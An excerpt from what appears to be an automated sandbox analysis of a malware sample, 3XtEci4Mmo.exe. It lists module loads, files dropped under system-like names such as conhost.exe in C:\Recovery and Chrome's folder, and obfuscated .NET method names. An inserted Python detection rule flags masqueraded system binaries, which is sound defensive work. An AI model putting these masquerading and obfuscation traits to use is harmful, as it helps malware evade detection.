                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exe  Section loaded: xmllite.dll
                          Source: C:\Recovery\conhost.exeSection loaded: mscoree.dll
                          Source: C:\Recovery\conhost.exeSection loaded: apphelp.dll
                          Source: C:\Recovery\conhost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Recovery\conhost.exeSection loaded: version.dll
                          Source: C:\Recovery\conhost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Recovery\conhost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\conhost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Recovery\conhost.exeSection loaded: windows.storage.dll
                          Source: C:\Recovery\conhost.exeSection loaded: wldp.dll
                          Source: C:\Recovery\conhost.exeSection loaded: profapi.dll
                          Source: C:\Recovery\conhost.exeSection loaded: cryptsp.dll
                          Source: C:\Recovery\conhost.exeSection loaded: rsaenh.dll
                          Source: C:\Recovery\conhost.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Windows Security\BrowserCore\en-US\78fe9fe6f28b21Jump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Google\Chrome\Application\conhost.exeJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeDirectory created: C:\Program Files\Google\Chrome\Application\088424020bedd6Jump to behavior
                          Source: 3XtEci4Mmo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: 3XtEci4Mmo.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                          Source: 3XtEci4Mmo.exeStatic file information: File size 3823616 > 1048576
                          Source: 3XtEci4Mmo.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3a5000
                          Source: 3XtEci4Mmo.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
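The rows above show conhost.exe running from C:\Recovery and being dropped under Chrome's application folder, which is what the "Files With System Process Name In Unsuspected Locations" and "System File Execution Location Anomaly" signatures in this report key on. The following is an added example, not Joe Sandbox's or the Sigma project's rule code: it implements that check over the paths observed here. The name-to-directory table (SYSTEM_PROCESS_HOMES), the WinSxS exception and the two legitimate control paths are assumptions for the example.

```python
"""Flag executables that carry a Windows system-process name but sit outside
the directory Windows installs them in.

Added example; not Joe Sandbox's or the Sigma project's rule code. The
name-to-home-directory table is an assumption kept short for the example;
a production allow-list must also cover KB-specific copies and any
vendor-sanctioned relocations.
"""
from pathlib import PureWindowsPath

# Assumed legitimate home directories per system process name (lower-cased).
SYSTEM_PROCESS_HOMES = {
    "conhost.exe":  (r"c:\windows\system32", r"c:\windows\syswow64"),
    "svchost.exe":  (r"c:\windows\system32", r"c:\windows\syswow64"),
    "csrss.exe":    (r"c:\windows\system32",),
    "lsass.exe":    (r"c:\windows\system32",),
    "dllhost.exe":  (r"c:\windows\system32", r"c:\windows\syswow64"),
    "explorer.exe": (r"c:\windows",),
}
# The component store keeps versioned copies in subfolders; treat it as legitimate.
WINSXS = r"c:\windows\winsxs"


def is_masqueraded_system_binary(path: str) -> bool:
    """True when the file name is a watched system-process name and its
    directory is not one of the expected locations for that name."""
    p = PureWindowsPath(path)
    homes = SYSTEM_PROCESS_HOMES.get(p.name.lower())
    if homes is None:
        return False                      # not a name we watch
    parent = str(p.parent).lower()
    if parent == WINSXS or parent.startswith(WINSXS + "\\"):
        return False                      # component-store copy
    return parent not in homes


def find_masqueraded(paths):
    """Return the offending paths, sorted for stable output."""
    return sorted(p for p in paths if is_masqueraded_system_binary(p))


# Constructed sample: dropped/launched paths taken from the report rows above,
# plus legitimate controls that are NOT from the report.
OBSERVED_PATHS = [
    r"C:\Recovery\conhost.exe",
    r"C:\Program Files\Google\Chrome\Application\conhost.exe",
    r"C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe",
    r"C:\Users\user\Desktop\3XtEci4Mmo.exe",
    r"C:\Windows\System32\conhost.exe",                         # control
    r"C:\Windows\explorer.exe",                                 # control
    r"C:\Windows\WinSxS\example_versioned_dir\conhost.exe",     # control, constructed
]

if __name__ == "__main__":
    for hit in find_masqueraded(OBSERVED_PATHS):
        print("system-process name outside its home directory:", hit)
```

The rule deliberately ignores files such as TezdDRgSgyeGDKRkzk.exe: a random name under Program Files is suspicious for other reasons (see the file-creation rows later in this report) but is not a system-name masquerade, and mixing the two signals into one rule makes both harder to tune.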

                          Data Obfuscation

                           Source: 3XtEci4Mmo.exe, r8fuc6TFjfWnUBPl3d1.cs | .Net Code: Type.GetTypeFromHandle(o94buaNBbcJMVaBCeQA.oaOpO9Bv3sX(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(o94buaNBbcJMVaBCeQA.oaOpO9Bv3sX(16777246)),Type.GetTypeFromHandle(o94buaNBbcJMVaBCeQA.oaOpO9Bv3sX(16777260))})
                           Source: C:\Users\user\Desktop\3XtEci4Mmo.exe | Code function: 0_2_00007FFD9BA47541 push eax; iretd 0_2_00007FFD9BA4754D
                           Source: 3XtEci4Mmo.exe, XDuT18ckg7mOHRs8nmK.cs | High entropy of concatenated method names: 'NREce5kXOc', 'cBqcYomYh8', 'OXlcSawN7A', 'KsmdhP5Ekkp8C9fRkrPx', 'vgP9Ts5EEVN91bPLlOjO', 'YBrlGh5Es8MLiiwtXODb', 'aeO7Wb5EudG2iEP8K3ZM', 'f9DcboHr3f', 'WsUcPfDnGf', 'l18cgoImaW'
                           Source: 3XtEci4Mmo.exe, oQ7OQAEYBpL0GFl2yPw.cs | High entropy of concatenated method names: '_25r', 'h65', 'TenEZOG3hZ', 'HdQEhjIMls', 'jUPEGnQP8L', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
                           Source: 3XtEci4Mmo.exe, YAiAdZMUZPbpZFvmuMy.cs | High entropy of concatenated method names: 'Df9M4mAo5N', 'OKGMeNZfIP', 'ERWMY0Kh2H', 'uc9MSyYjAY', 'dSAMZBph2f', 'sq0MhssD7X', 'JLgMG2op6x', 'LMkMMnJCvI', 'sKO64d5x7K1N7PVETnFD', 'cTAOJZ5xBBD1Avxu7tFD'
                           Source: 3XtEci4Mmo.exe, YvJZXfOtrQea2ypiqfQ.cs | High entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'RAo5AFbhLkh', 'DUE5Vzo2IwB', 'yTZBZa5upiqmZdhD8OcJ', 'uGiQNS5uV15AOUWiIrW7', 'zokSM75uDDQM2qojQbKZ', 'br3L8l5uOQrk3cf13gTI', 'Ev35T55udmtcFPDrDpP4'
                           Source: 3XtEci4Mmo.exe, VGwHCrsuW2RRHXbaOqB.cs | High entropy of concatenated method names: 'JWgsEePEcU', 'xYDsbZ6EcF', 'VSrsP4Yjob', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'oJOsgV7k9O'
                           Source: 3XtEci4Mmo.exe, VfkQOxORNVgyn05CXI4.cs | High entropy of concatenated method names: 'UQ6Ob7EOmD', 'sSJOPp77v5', 'gSsZUV5uHL8lV9RhHkFo', 'RJO2J35uIp5dfEPv0qSh', 'Y4Z0XN5uW72QtnMfFF4d', 'elF4yj5umGHfCCR5Z2T5', 'sisOIfbl4w', 'cwaOW8RSU1', 'i7nOHylCof', 'bgiOmuFWPr'
                           Source: 3XtEci4Mmo.exe, oqigSRBMI41rmDyj8d4.cs | High entropy of concatenated method names: 'USBlVW5UEej64ZmibT5Q', 'N5XO2F5UudaFvN9BbL4A', 'rZYnrY5UkN0U5XQyWuOi', 'uP0KHE5Ubd0A0ZQJiWgF', 'eaqRWybywS', 'MHY1eP5U1j0tUufKkpim', 'dgicpc5Ugki2dCfo76my', 'Crb01U5ULAMUftkHPyQp', 'PgaKyO5U9qF1M3A5ujIo', 'nIpbCK5UJxrHM9lRQcrT'
                           Source: 3XtEci4Mmo.exe, ss5cMKwVjRcNSNgIPbh.cs | High entropy of concatenated method names: 'tWDwO8Lfcq', 'PnuwdxwYA3', 'kvgwcTG3XO', 'MndwAHplYR', 'k4lwyWK9Q9', 'TBEE5W54T6p0hC5YblCO', 'MusyNf54vTUrP2Ma8EnB', 'duvnZV542cVxpnaVLof0', 'EigPCH54x6j4761LptJV', 'ct4E0h54NEnO66MNj6Nr'
                           Source: 3XtEci4Mmo.exe, nKLxTTo7rNk4JG4JrZD.cs | High entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'WKAoF3iYUX', '_947', 'AdDoqGPANl', 's4qoR8WyhC', '_1f8', '_71D'
                           Source: 3XtEci4Mmo.exe, W51hF452rDbaEZ4TPAR.cs | High entropy of concatenated method names: 'io8', 'V29', 'j67', '_2Q4', 'pi9', 'lbh5A7FDbiZ', 'CYD5VZdZcft', 'UmwJSy5wjlv3S0s7KM6g', 'moS3yx5w86akUcaQrGNn', 'Tf2Dn35wsY2KnL1ouuJY'
                           Source: 3XtEci4Mmo.exe, pR1dknVrrool85tJX3w.cs | High entropy of concatenated method names: 'b0GVw3Gj1F', 'Yx7Vj44fRR', 'lQlV8oUgVk', 'XyfYR158tXlAGR1YOOQb', 'fht9d658XI6D8SrsrdmD', 'z34WBS58fqLBHpewN7lH', 'GWnnUq58KuqcjHYDsPWH', 'LgMVIDOUX7', 'yw4VWCpGk0', 'tYFpcS58AxWlJmchkRbL'
                           Source: 3XtEci4Mmo.exe, JXAsLR6ynDv5Iu1fJQh.cs | High entropy of concatenated method names: 'JI06K6LFCb', 'XitbeK5PTx1dsdtbVeDa', 'vLQdpL5PvC0Khr19g8Lr', 'eZmZ9o5P2YcZbCSiRsgL', 'Ls6ia95PxWK6JUr9O6Nd', '_53Y', 'd65', 'q3s5DnxbML0', 'Vxs5DIerwEG', 'GNZ5AuheQ7f'
                           Source: 3XtEci4Mmo.exe, Qga3URZT8x6WLrvx99Y.cs | High entropy of concatenated method names: 'QOJhffvGy4', 'gwrAVj52OVD1920AiCpY', 'grRhN852VOU715YAfNTQ', 'vEE2Mg52DJUgwr0EoHtX', 'CnR4Q652daxLSrY0fLqT', 'uETCLe52cmPHD9glESq4', 'CPX', 'h7V', 'G6s', '_2r8'
                           Source: 3XtEci4Mmo.exe, LubZ5VX8s0KvdnHBpHk.cs | High entropy of concatenated method names: 'zTTt7VhUTi', 'Fb48755L4c2DF8uRg9KD', 'uhcG955LU5DE2kSxFob4', 'qFfxBf5LiVHhk0JhS9w0', 'SDXts85Le5fCG0thuAjm', 'LyqXuH0U3Y', 'PgYXkt5ZUc', 'VXYXE2KgE7', 'H36Xb7yN17', 'aqhXPff4Wc'
                           Source: 3XtEci4Mmo.exe, rRyqPVVNPWM30jUSo2n.cs | High entropy of concatenated method names: 'gOcDoWIdUJ', 'DsCc1Z5sDs1GIAH6tW3S', 'K3wObo5sOAVvj56yMJTB', 'GAZJ9o5spy3Ot0NEH8BH', 'aIgKik5sV0Hc4OQJtSAI', 'HQfhgF5sy7mjbNyLXiMV', 'BC080p5scMPGbFZjQeGD', 'll3ARD5sA690E9ym60S2', 's7h4Wk5s6REqQpifYNPs', 'fGBDRWdVkt'
                           Source: 3XtEci4Mmo.exe, h8HI4Jymb1qecqTOHW7.cs | High entropy of concatenated method names: '_71a', 'd65', 'Gvv5DX6Qt3i', 'rp05DfopdfU', 'ux05AHyR8Al', 'Xun5DaxnNBd', 'KY1gKM5POEkKlBy9w3Rl', 'NLbHaS5PdsqOFHYl69s4', 'MxQQuT5PcXnXWmpgvjbm', 'oZoWFv5PA5OYLS43qS2h'
                           Source: 3XtEci4Mmo.exe, stiBkjoCCwm4lV09ZWp.cs | High entropy of concatenated method names: 'GpL0a8TVeG', 'V6e05kuNnj', 'Uou0pba701', 'DDo0VnnSex', 'Frr0D94Ccl', 'TNmrNk59pfn47fpmwkKf', 'qUtHkr59aGUhhCTZq1Si', 'it1THO595UqIsyQ0rSXG', 'Dpy1jt59Vfbsj1LddE3o', 'kdBlds59DsWSFFsUQ6vn'
                           Source: 3XtEci4Mmo.exe, Qq1ICpBWOq26h1c01tP.cs | High entropy of concatenated method names: 'vNq', 'O3Q', 'a43', 'V8g', 'g39', '_9By', 'h74', 'fl2', '_4L8', '_8e1'
                           Source: 3XtEci4Mmo.exe, VKySMr590d78Ew3pDGf.cs | High entropy of concatenated method names: 'n39', 'V29', '_4yb', '_2Q4', 'p93', 'TGL5ABa88Rq', 'CYD5VZdZcft', 'VDPqQn5woLhduqgDLVdx', 'UhSpgc5w0kdjYFUnqKEL', 'HRLbEX5wrRLfQpxO3GcX'
                           Source: 3XtEci4Mmo.exe, fD0mRsBvFudi30WfIC.cs | High entropy of concatenated method names: 'S3uEQJvYc', 'mRScXN5HTfa6SpJkD1Cb', 'Nv7ghn5HxTtcteHR1Lie', 'a1ATqU5HvyNCtXIjpR5f', 'Vy8pqO5H2H4T6eSG2jtI', 'MkF78iJRR', 'JGhQsACSb', 'MxSF21c2P', 'w1QqoIiBE', 'PDjRgQu8N'
                           Source: 3XtEci4Mmo.exe, o4RP71saBgOEoJQfAYq.cs | High entropy of concatenated method names: 'a4Q', '_6h5', '_4fY', '_32D', 'j7E', 'Lr9', '_7ik', '_9X3', 'g6m', '_633'
                           Source: 3XtEci4Mmo.exe, HeTWIOwoanWxYRVBJ0f.cs | High entropy of concatenated method names: 'NSLwru7yJO', 'WIiwBfjO4Z', 'GxZwliBsJo', 'QZLHIo5eARX1hyu3tUKp', 'GORZ9x5edn7AIkBGPGoQ', 'Iltlnx5ec4O3E8Egx7u7', 'qRxKNv5eyvVfKAKtiT0A', 'xxKGGk5e6pLnV70jnPpY', 'pmKm0f5eXUUgLqibQKOt'
                           Source: 3XtEci4Mmo.exe, dlHYibKG1C8oBEoTInU.cs | High entropy of concatenated method names: 'd5uKvxxLwA', 'fO1K2o9Jp0', 'VrRKT7An4f', 'OErKxTFhA2', 'ETbKNgVkwF', 'Cf1T7951EZgmgSCLKUfD', 'tuUbcu51uUUdHygWbm5L', 'fbjlYa51kRLZR7A72Qt7', 'Nnh63251bXWpfqVYXMQP', 'GEOqhT51PYQtupLb9Gnl'
                           Source: 3XtEci4Mmo.exe, HqnsyhVYhDWmIHtSi1I.cs | High entropy of concatenated method names: 'WVSVGWQieK', 'b3VJop58k6BDSaZrB2gd', 'advmBH58s163j0d7YBDK', 'bRaceP58ubRD3SqyFlM1', 'kcq6M558ErXroMJ6iQmB', 'nbOVZcTsPH', 'lKBkSK58mKmenEsjfDDJ', 'PenoFj58wBBggbukBBk0', 'sK11KM58WolRCtZde9AE', 'PgUOO458HdepPy8MagZw'
                           Source: 3XtEci4Mmo.exe, NstwfCKuk5H6PuZyE10.cs | High entropy of concatenated method names: 'j9l', 'zWyKE3gjuQ', 'YZMKbbiH5I', 'evvKPp9cYA', 'XWWKg00SGM', 'CwGKLvEWyX', 'U7bK1xSoD8', 'F5FfUo51qiQHNBkeUtyt', 'IyReUG51Qk3c4so1cdfo', 'wZJKJT51FxMXkoBoibqh'
                           Source: 3XtEci4Mmo.exe, UpJdVpz4L2dZH3HuVj.cs | High entropy of concatenated method names: 'eCQ552yegA', 'lN35VsnweB', 'rVa5DhaWvB', 'ti85Oa791I', 'SxP5dqlUf4', 'eUZ5cmO3gt', 'vpU5ym9EVn', 'Eckupw5mscXVuwL1ZtuK', 'o9ajFy5mu06sW2ctglN7', 'g3tWKu5mkED5py0QildO'
                           Source: 3XtEci4Mmo.exe, eGOpidDWGp4xEbq6LpE.cs | High entropy of concatenated method names: 'pZODmSohbp', 'lABDwMWuUN', 'i6gDjKIcr1', 'xgdD8M6EdC', 'kwgGZa5sQ6JF5Xb6s00Z', 'P2AdD15slkB9RqIyp8Tb', 'mVxyuW5s7EnA74pYwnHt', 'AWiaau5sFG6RjUcZB9eR', 'jaKgfW5sqJbijaLBSVNr', 'IvZTmQ5sRbXcbFgJCJAE'
                           Source: 3XtEci4Mmo.exe, sCaJt9pUQAyRWikPj10.cs | High entropy of concatenated method names: 'ubupNA0q3j', 'yGHpC3Yucc', 'Skupzf1OKy', 'PB9tUb5jLWK5UWDbX5PG', 'mGxrtk5j1bpqo697DQJi', 'R5GiiA5jPvfVdE2kFDo8', 'uOIQNA5jgd7PmycnD3gE', 'vVOVOH2Up5', 'Hy5UJV5jUQqeGFA3POSy', 'J5GSmF5jJiXZ7PsgTIOw'
                           Source: 3XtEci4Mmo.exe, LDxoP1VbEe3ov8KpZVy.cs | High entropy of concatenated method names: 'XaeVgJPJ2V', 'TwbVLyCBRg', 'xu6V1YEoc0', 'bcNV98nev7', 'E3KVJOnvUx', 'zdIV3TMqVv', 'IKwVUSQVBb', 'm1tVildC9F', 'T0aV42wTNI', 'nVJVeIpYHv'
                           Source: 3XtEci4Mmo.exe, rj7rdZ60nbJL8sDeTRq.cs | High entropy of concatenated method names: '_5t1', 'd65', 'wNA5DHJxsDP', 'Q1P5Dm5RH9n', 'GkP6BiKU5u', 'PpJ5Aksho4m', 'Xun5DaxnNBd', 'j7d0dU5PCsdRTIGCsu6c', 'eYX2QJ5Pzb4gLlqDVLa9', 'YPHUvi5gaRZse3h0V9Eh'
                           Source: 3XtEci4Mmo.exe, PKN9PVhsJB13y5BuQxg.cs | High entropy of concatenated method names: 'iHQhEdHef6', 'YGdhL6bkMY', 'FVAhJoc9mp', 'EgFh3jA1Tk', 'ev6hUpGDb5', 'VyahiobnI9', 'Ynjh4n1f6G', 'QrkheM9HGj', '_0023Nn', 'Dispose'
                           Source: 3XtEci4Mmo.exe, Ji9uCVsm3umZPfqpIEZ.cs | High entropy of concatenated method names: '_57l', '_9m5', 't8K', 'k49', 'p65', '_3B1', '_4Pp', '_3M7', '_7b3', 'fAL'
                           Source: 3XtEci4Mmo.exe, m4GL6Xp0tf6vL6bNURi.cs | High entropy of concatenated method names: 'Ej7pBSKI8L', 'I5qple0PcU', 'z8ri605w2gmRcv7EcHu3', 'a5oGWH5wMVvgkBArrE6h', 'skc7HR5wvDCJFam3oIoM', 'sO3wY75wTDJthqD0xxXd', 'qpqhxm5wxOTQRvSMMie7', 'Dtgp505wNDrkwtLU54Iq', 'PLCS345wCQNE8UGponam', 'hKtlgF5wzdi6pcqJTP5u'
                           Source: 3XtEci4Mmo.exe, TWg5L4j1Q9belZsMcrx.cs | High entropy of concatenated method names: 'eT1jJEVavH', 'bFQj3PXstR', 'ItRjUqySHf', 'FZyjirbsVQ', 'H20j4Kj458', 'SxVjewU5QB', '_4tg', 'wk8', '_59a', '_914'
